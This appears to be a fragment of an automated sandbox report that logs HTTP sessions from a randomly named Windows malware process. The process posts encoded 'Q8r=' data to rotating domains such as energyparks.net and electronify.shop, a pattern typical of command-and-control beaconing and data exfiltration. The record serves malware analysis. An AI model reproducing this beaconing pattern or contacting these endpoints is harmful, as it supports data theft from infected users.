Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	50021	3.33.130.190	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:12:06.411699057 CET	10843	OUT	POST /87jo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Host: www.energyparks.net Origin: http://www.energyparks.net Content-Length: 10300 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.energyparks.net/87jo/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13 Data Raw: 51 38 72 3d 6c 78 61 4d 41 72 6a 47 79 76 64 6a 47 68 2b 33 5a 47 75 57 64 6d 76 31 73 54 6b 34 51 73 73 50 34 4f 6a 41 46 78 68 4b 30 54 4f 66 78 53 50 2f 4d 39 50 33 51 4c 31 6f 35 66 69 41 53 6a 77 56 4c 4e 48 31 63 65 77 6c 4e 36 38 61 67 69 38 5a 63 75 4a 57 4d 4f 58 6f 53 49 4e 46 74 52 55 62 36 64 50 6f 4e 2f 58 54 59 30 69 53 7a 75 36 39 65 6c 41 32 4e 2f 52 6c 39 36 77 72 71 4b 58 64 35 33 75 2f 4f 59 42 38 5a 6b 4e 34 73 62 52 4e 75 57 68 4e 32 71 62 51 64 79 61 32 50 4d 55 74 45 4d 38 32 31 51 73 35 4b 78 36 33 49 6c 2f 35 53 56 4d 52 6f 68 51 6b 68 35 6e 31 67 54 65 46 77 6b 41 33 71 48 39 70 78 6e 34 56 6a 2b 52 73 62 65 76 70 76 76 2b 68 56 47 67 32 62 31 4c 6d 32 39 54 57 38 4a 69 39 2f 63 69 4d 44 66 45 4a 42 65 79 48 4d 4b 58 4a 4c 78 46 73 74 6f 75 5a 72 38 74 55 4f 39 59 47 35 2b 48 35 73 57 71 4d 58 38 46 73 45 43 70 2f 78 31 38 42 74 71 33 4f 68 67 47 6b 51 51 77 33 35 57 44 67 4d 35 35 65 56 67 79 74 35 53 46 4f 4f 55 32 4c 39 44 59 77 36 33 72 4b 32 70 78 70 45 75 33 58 38 5a [TRUNCATED] Data Ascii: Q8r=lxaMArjGyvdjGh+3ZGuWdmv1sTk4QssP4OjAFxhK0TOfxSP/M9P3QL1o5fiASjwVLNH1cewlN68agi8ZcuJWMOXoSINFtRUb6dPoN/XTY0iSzu69elA2N/Rl96wrqKXd53u/OYB8ZkN4sbRNuWhN2qbQdya2PMUtEM821Qs5Kx63Il/5SVMRohQkh5n1gTeFwkA3qH9pxn4Vj+Rsbevpvv+hVGg2b1Lm29TW8Ji9/ciMDfEJBeyHMKXJLxFstouZr8tUO9YG5+H5sWqMX8FsECp/x18Btq3OhgGkQQw35WDgM55eVgyt5SFOOU2L9DYw63rK2pxpEu3X8Zq9675vD6cQ8XjxYp5RzY/mKvs9uSHlpqpY2g6445OgoX7Xkm2GhbH0LzXNu16TYJLPQo4SC58PHo0PqBhPkC0wUjl/h5nNFCP0XqKMUCvmTSh5wLxA37dZP9yhrKX2pIYEB5IUpBFxRiH1GjxWwzIXBPKAohMLqhFafyqWFrkeHhQ63jtmnALqpBN28j2tubRcam9npE1P+8dEm2NgTDgLSa0sOH1E0vKVORSTO1hBKsj5nHja2ImF1NUvCc7SQsBTMMybH+uclmxV90LPtkM9cYxRYZbAiCLzrIKNCxSxRHmcXQeEbvjP05YJOR0X1Ew6XKYqRXLiXuBl1yvNck459xug2WH0jNUzMBARvcmqxLOWBzzfE5D17s23qOWzlNaEL6udr6neCzYT3CfqmhuFUoeb80tP6qyX9a3I71M1RFFhAq4fi8v0eQmJHJjah3yVnxo5Ru0U16JSIkSBZH/nW4iMrlrTYqtz4el3VNDK6IdHhHWjn9DkAWPI1gHxSxlqI1cmUXsJayIegzZ0uCeTAokIfymKgdDtuBc/2xJ6RYJLKWq0PftTcWiRlN3lGOb1D42iYG/ONSJDSPc7WsroFSiNH2rNmEBGOglNck66ex1k1tBVe7MdF9DWWqiWrv11KqQLRpa7jofV+fLnnPQMaisW1DpUNqme [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	50022	3.33.130.190	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:12:08.952990055 CET	467	OUT	GET /87jo/?Q8r=ozysDd3vwv9gaS29FRbnc0GmlFkZcaQYkpXnKEUw0wCH0hn9MIemfLYf1abLLDUSAte8bdVQTpE72RtdL6FpCvjERq56vwlcganuPeakPXnenu2oXl0fStc=&6trpq=anQT3n HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Host: www.energyparks.net Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
Nov 4, 2024 10:12:10.520934105 CET	392	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 04 Nov 2024 09:12:10 GMT Content-Type: text/html Content-Length: 252 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 51 38 72 3d 6f 7a 79 73 44 64 33 76 77 76 39 67 61 53 32 39 46 52 62 6e 63 30 47 6d 6c 46 6b 5a 63 61 51 59 6b 70 58 6e 4b 45 55 77 30 77 43 48 30 68 6e 39 4d 49 65 6d 66 4c 59 66 31 61 62 4c 4c 44 55 53 41 74 65 38 62 64 56 51 54 70 45 37 32 52 74 64 4c 36 46 70 43 76 6a 45 52 71 35 36 76 77 6c 63 67 61 6e 75 50 65 61 6b 50 58 6e 65 6e 75 32 6f 58 6c 30 66 53 74 63 3d 26 36 74 72 70 71 3d 61 6e 51 54 33 6e 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Q8r=ozysDd3vwv9gaS29FRbnc0GmlFkZcaQYkpXnKEUw0wCH0hn9MIemfLYf1abLLDUSAte8bdVQTpE72RtdL6FpCvjERq56vwlcganuPeakPXnenu2oXl0fStc=&6trpq=anQT3n"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	50023	84.32.84.32	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:12:15.617593050 CET	744	OUT	POST /3ase/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Host: www.electronify.shop Origin: http://www.electronify.shop Content-Length: 200 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.electronify.shop/3ase/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13 Data Raw: 51 38 72 3d 53 33 64 47 6b 45 74 73 4f 79 56 2b 35 65 53 4c 73 37 36 4e 4e 4e 54 4f 72 39 7a 35 4e 34 61 38 34 31 4a 51 32 6c 71 42 4c 6c 57 6e 5a 77 31 47 54 58 43 6d 45 72 53 34 68 70 59 39 71 74 6b 38 50 66 58 44 2b 77 4c 59 47 36 62 71 5a 50 71 49 41 4b 55 33 63 51 68 42 33 42 70 31 55 56 4a 45 73 35 78 67 4d 44 76 71 4c 4c 49 77 74 4f 63 36 4d 32 5a 71 42 50 50 48 34 7a 66 70 5a 77 78 7a 77 69 58 76 71 59 7a 6f 76 45 69 4c 45 63 69 6c 4c 4e 42 68 73 43 75 39 50 53 63 66 70 4c 61 37 2f 47 72 57 37 68 49 65 7a 35 6a 51 64 58 6e 6a 49 41 42 37 2f 47 43 31 2b 4f 70 4c 41 32 50 77 67 77 3d 3d Data Ascii: Q8r=S3dGkEtsOyV+5eSLs76NNNTOr9z5N4a841JQ2lqBLlWnZw1GTXCmErS4hpY9qtk8PfXD+wLYG6bqZPqIAKU3cQhB3Bp1UVJEs5xgMDvqLLIwtOc6M2ZqBPPH4zfpZwxzwiXvqYzovEiLEcilLNBhsCu9PScfpLa7/GrW7hIez5jQdXnjIAB7/GC1+OpLA2Pwgw==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	50024	84.32.84.32	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:12:18.158333063 CET	764	OUT	POST /3ase/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Host: www.electronify.shop Origin: http://www.electronify.shop Content-Length: 220 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.electronify.shop/3ase/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13 Data Raw: 51 38 72 3d 53 33 64 47 6b 45 74 73 4f 79 56 2b 34 2b 69 4c 75 59 53 4e 63 74 54 4e 79 4e 7a 35 61 6f 61 34 34 31 56 51 32 68 61 52 4d 54 47 6e 5a 52 6c 47 43 6d 43 6d 46 72 53 34 70 4a 59 34 33 39 6b 42 50 66 4c 4c 2b 78 33 59 47 2b 7a 71 5a 4e 69 49 41 62 55 30 4f 77 68 66 37 68 70 33 4b 6c 4a 45 73 35 78 67 4d 43 4c 51 4c 4b 67 77 74 2f 73 36 4d 55 68 70 64 2f 50 41 77 54 66 70 64 77 78 2f 77 69 57 43 71 63 7a 4f 76 43 6d 4c 45 65 36 6c 46 2f 6c 75 35 53 75 42 4c 53 64 39 6b 49 37 50 2f 6e 57 57 39 53 6f 66 31 62 62 56 52 78 71 35 5a 78 67 73 74 47 6d 47 6a 4a 67 2f 4e 31 79 35 37 2b 46 6e 36 75 6d 72 6e 49 34 68 7a 4d 4c 5a 79 6d 43 6c 55 76 55 3d Data Ascii: Q8r=S3dGkEtsOyV+4+iLuYSNctTNyNz5aoa441VQ2haRMTGnZRlGCmCmFrS4pJY439kBPfLL+x3YG+zqZNiIAbU0Owhf7hp3KlJEs5xgMCLQLKgwt/s6MUhpd/PAwTfpdwx/wiWCqczOvCmLEe6lF/lu5SuBLSd9kI7P/nWW9Sof1bbVRxq5ZxgstGmGjJg/N1y57+Fn6umrnI4hzMLZymClUvU=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	50025	84.32.84.32	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:12:20.704643965 CET	10846	OUT	POST /3ase/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Host: www.electronify.shop Origin: http://www.electronify.shop Content-Length: 10300 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.electronify.shop/3ase/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13 Data Raw: 51 38 72 3d 53 33 64 47 6b 45 74 73 4f 79 56 2b 34 2b 69 4c 75 59 53 4e 63 74 54 4e 79 4e 7a 35 61 6f 61 34 34 31 56 51 32 68 61 52 4d 54 4f 6e 5a 44 39 47 51 31 36 6d 55 62 53 34 6a 70 59 35 33 39 6b 6d 50 66 44 48 2b 78 37 69 47 34 33 71 59 6f 32 49 55 35 77 30 58 41 68 66 6b 52 70 32 55 56 4a 52 73 35 67 72 4d 44 37 51 4c 4b 67 77 74 38 45 36 4b 47 5a 70 4f 76 50 48 34 7a 66 4d 5a 77 78 54 77 69 65 38 71 63 2f 65 76 79 47 4c 45 2b 71 6c 4a 73 42 75 34 79 75 44 47 79 64 62 6b 49 33 51 2f 6d 36 67 39 54 4e 36 31 59 48 56 41 30 50 6c 4e 79 55 53 35 41 4b 4f 39 75 4e 64 4b 56 57 2b 37 2b 68 41 33 39 6e 77 2f 49 4d 54 30 4d 75 4b 69 55 71 30 4c 76 78 72 42 31 59 61 38 5a 4d 44 30 71 32 79 44 7a 65 4f 70 4d 4b 6a 45 52 66 4b 51 51 77 4c 51 51 4b 6f 39 7a 64 6f 4a 64 37 34 31 39 32 32 57 35 65 31 4f 6c 66 43 53 2f 7a 54 6b 4a 37 6e 66 56 69 45 57 65 66 4e 33 54 77 64 69 53 62 52 36 38 36 67 65 48 6a 35 37 6a 50 4b 71 50 78 30 75 56 42 49 6f 69 4a 62 69 54 37 4d 59 62 4c 4f 6c 43 52 71 45 76 41 4c 53 2b [TRUNCATED] Data Ascii: Q8r=S3dGkEtsOyV+4+iLuYSNctTNyNz5aoa441VQ2haRMTOnZD9GQ16mUbS4jpY539kmPfDH+x7iG43qYo2IU5w0XAhfkRp2UVJRs5grMD7QLKgwt8E6KGZpOvPH4zfMZwxTwie8qc/evyGLE+qlJsBu4yuDGydbkI3Q/m6g9TN61YHVA0PlNyUS5AKO9uNdKVW+7+hA39nw/IMT0MuKiUq0LvxrB1Ya8ZMD0q2yDzeOpMKjERfKQQwLQQKo9zdoJd741922W5e1OlfCS/zTkJ7nfViEWefN3TwdiSbR686geHj57jPKqPx0uVBIoiJbiT7MYbLOlCRqEvALS+Vxn4UizDRw+QLRogml8gUOwdNcXypW43RGtM0fBNXi3/6o28Mweo9xGPohtuGRJg+A9nZ+6TC/9QjNeuyn1J9KZIwFp7P+39WIVFaaMHLcAn2VArUVXsLBxm3IH0FA7ImdgKk48mDMZmtFnZXmW9Jc7oxaVxemKt1RfpBX1avmFt8v8QX5W5JNrulXdVvnx9CzymEOGCi7ii302uhXKjnqRB3uNjso1w8lDyuvF1TD0NiPP/1tPXF+jOvImyyVrEPDAEgf+qqyrZYZbUqP8sL4QsUM8OPaF4CpV43k85jllXwLyFJ5eQn5/e3z0GJOSYd2w30/sOB5Q45N3Pv1Q1Fm8eheK16hfbUKBKbqt1somrNk7YjdIWDNpWt+p4MFutr+UwTjhYsOnVHcgQBhiAa7TUyWepuLCIvSg3CeBZv8QyjpwnSSwezetBH05JkIdj1w8IerFLeZQ44qLBOcjIvTE24TkO0U/wyhLMGUztUP1u8Q12Ykj+hXdiNR7eoFde1j/m1wc6vNvWNE2Z2Hsay0llaADGZHrBcDUsBRSvGjhlUkBMEYQNmK6XopccNvG3EF6PTfbYWC4vZvB0Di3a6y+HXqcakcwbyKkjneoaz+mvLttLlvDm/bk2Kq65FKHBIvlN1099hBgpHwxBK7X5pjc9KQaQOMOQFh [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	50026	84.32.84.32	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:12:23.251815081 CET	468	OUT	GET /3ase/?Q8r=f11mnzhDDGBf+/artp+PfsS316rmJteNkA5Z8hOTIieoFxtTQBGeVYPutJ4Jq/YWKuaYmzuYepHFf+3fXfMgZDBF3jtHXko48sZRIiancbFNwMQpED1LC8k=&6trpq=anQT3n HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Host: www.electronify.shop Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
Nov 4, 2024 10:12:24.065368891 CET	1236	IN	HTTP/1.1 200 OK Server: hcdn Date: Mon, 04 Nov 2024 09:12:23 GMT Content-Type: text/html Content-Length: 10072 Connection: close Vary: Accept-Encoding alt-svc: h3=":443"; ma=86400 x-hcdn-request-id: a96f43aae4b8346c0026fb43c96bdc91-int-edge1 Expires: Mon, 04 Nov 2024 09:12:22 GMT Cache-Control: no-cache Accept-Ranges: bytes Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED] Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
Nov 4, 2024 10:12:24.065390110 CET	1236	IN	Data Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600
Nov 4, 2024 10:12:24.065401077 CET	424	IN	Data Raw: 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 Data Ascii: x;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-c
Nov 4, 2024 10:12:24.065412045 CET	1236	IN	Data Raw: 70 78 20 30 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 62 61 73 65 6c 69 6e 65 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6d 65 73 73 61 67 65 20 70 7b 66 6f 6e 74 2d 77 65 69 67 Data Ascii: px 0;align-items:baseline;border-radius:5px;position:relative}.message p{font-weight:400;font-size:14px;line-height:24px}#pathName{color:#2f1c6a;font-weight:700;overflow-wrap:break-word;font-size:40px;line-height:48px;margin-bottom:16px}.secti
Nov 4, 2024 10:12:24.065432072 CET	1236	IN	Data Raw: 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 33 30 70 78 7d 2e 6e 61 76 62 61 72 2d 6c 69 6e 6b 73 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 Data Ascii: container{margin-top:30px}.navbar-links{display:flex;flex-direction:column;align-items:center}.navbar-links>li{margin:0}.top-container{flex-direction:column-reverse}}</style><script src="https://www.googletagmanager.com/gtag/js?id=UA-26575989-
Nov 4, 2024 10:12:24.065442085 CET	424	IN	Data Raw: 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d 2f 61 66 66 69 6c 69 61 74 65 73 20 72 65 6c 3d 6e 6f 66 6f 6c 6c 6f 77 3e 3c 69 20 61 72 69 61 2d 68 69 64 64 Data Ascii: /a></li><li><a href=https://www.hostinger.com/affiliates rel=nofollow><i aria-hidden=true class="fas fa-users"></i> Affiliates</a></li><li><a href=https://hpanel.hostinger.com/login rel=nofollow><i aria-hidden=true class="fas fa-sign-in-alt"><
Nov 4, 2024 10:12:24.065459967 CET	1236	IN	Data Raw: 63 6c 61 73 73 3d 6d 65 73 73 61 67 65 2d 73 75 62 74 69 74 6c 65 3e 48 61 70 70 79 20 74 6f 20 73 65 65 20 79 6f 75 72 20 64 6f 6d 61 69 6e 20 77 69 74 68 20 48 6f 73 74 69 6e 67 65 72 21 3c 2f 64 69 76 3e 3c 70 3e 59 6f 75 72 20 64 6f 6d 61 69 Data Ascii: class=message-subtitle>Happy to see your domain with Hostinger!</div><p>Your domain is active and is using Hostinger nameservers. Take the recommended steps below to continue your journey with Hostinger.</p></div><img src=https://cdn.hostinger
Nov 4, 2024 10:12:24.065623999 CET	1236	IN	Data Raw: 73 74 6f 6d 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6c 75 6d 6e 2d 74 69 74 6c 65 3e 43 68 61 6e 67 65 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 65 72 76 Data Ascii: stom-wrap"><div class=column-custom><div class=column-title>Change domain nameservers</div><br><p>Manage your domain nameservers in the domain management page of your Hostinger account.</p><br><a href=https://support.hostinger.com/en/articles/
Nov 4, 2024 10:12:24.065634966 CET	424	IN	Data Raw: 65 2e 6c 65 6e 67 74 68 3b 66 6f 72 28 61 3d 31 32 38 2c 66 3d 30 2c 69 3d 37 32 2c 28 63 3d 65 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 22 2d 22 29 29 3c 30 26 26 28 63 3d 30 29 2c 75 3d 30 3b 75 3c 63 3b 2b 2b 75 29 7b 69 66 28 74 26 26 28 79 5b Data Ascii: e.length;for(a=128,f=0,i=72,(c=e.lastIndexOf("-"))<0&&(c=0),u=0;u<c;++u){if(t&&(y[m.length]=e.charCodeAt(u)-65<26),128<=e.charCodeAt(u))throw new RangeError("Illegal input >= 0x80");m.push(e.charCodeAt(u))}for(d=0<c?c+1:0;d<E;){for(l=f,p=1,g=o
Nov 4, 2024 10:12:24.065655947 CET	1236	IN	Data Raw: 66 6c 6f 6f 72 28 28 72 2d 66 29 2f 70 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76 65 72 66 6c 6f 77 28 31 29 22 29 3b 69 66 28 66 2b 3d 73 2a 70 2c 73 3c 28 43 3d 67 3c 3d 69 3f 31 3a 69 2b 32 36 Data Ascii: floor((r-f)/p))throw RangeError("punycode_overflow(1)");if(f+=sp,s<(C=g<=i?1:i+26<=g?26:g-i))break;if(p>Math.floor(r/(o-C)))throw RangeError("punycode_overflow(2)");p=o-C}if(i=n(f-l,h=m.length+1,0===l),Math.floor(f/h)>r-a)throw RangeError("p
Nov 4, 2024 10:12:24.070408106 CET	488	IN	Data Raw: 7d 2b 2b 66 2c 2b 2b 68 7d 72 65 74 75 72 6e 20 79 2e 6a 6f 69 6e 28 22 22 29 7d 2c 74 68 69 73 2e 54 6f 41 53 43 49 49 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 66 6f 72 28 76 61 72 20 72 3d 6f 2e 73 70 6c 69 74 28 22 2e 22 29 2c 65 3d 5b 5d 2c 6e Data Ascii: }++f,++h}return y.join("")},this.ToASCII=function(o){for(var r=o.split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/[^A-Za-z0-9-]/)?"xn--"+punycode.encode(t):t)}return e.join(".")},this.ToUnicode=function(o){for(var r=o.split("."),

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	50027	162.0.231.203	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:12:29.227746964 CET	729	OUT	POST /4ecw/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Host: www.sibeta.info Origin: http://www.sibeta.info Content-Length: 200 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.sibeta.info/4ecw/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13 Data Raw: 51 38 72 3d 35 66 34 63 42 61 4a 4a 4a 75 55 34 37 76 6e 72 4f 31 52 34 71 36 39 42 38 76 42 4b 35 6b 6b 62 6e 4d 69 4f 43 45 4b 77 32 56 4f 41 45 44 4c 67 33 4c 47 74 46 4c 53 73 6f 69 46 63 36 78 74 55 4e 2f 41 74 77 6d 44 59 74 71 55 4a 76 46 61 58 6f 78 4b 34 58 45 4c 6e 55 44 54 6a 44 32 5a 53 4b 31 74 53 37 55 6d 55 39 44 34 74 50 31 73 76 53 34 76 66 41 46 56 77 5a 4c 5a 70 2f 43 66 4d 4e 64 4d 7a 59 7a 34 4f 30 57 2b 30 74 6c 39 61 34 59 31 2b 62 54 48 65 39 54 59 2b 48 6e 74 74 2f 4c 58 6f 64 54 2b 37 55 63 33 78 45 6c 30 62 47 42 32 42 35 31 41 39 62 32 50 33 6e 77 55 6e 54 77 3d 3d Data Ascii: Q8r=5f4cBaJJJuU47vnrO1R4q69B8vBK5kkbnMiOCEKw2VOAEDLg3LGtFLSsoiFc6xtUN/AtwmDYtqUJvFaXoxK4XELnUDTjD2ZSK1tS7UmU9D4tP1svS4vfAFVwZLZp/CfMNdMzYz4O0W+0tl9a4Y1+bTHe9TY+Hntt/LXodT+7Uc3xEl0bGB2B51A9b2P3nwUnTw==
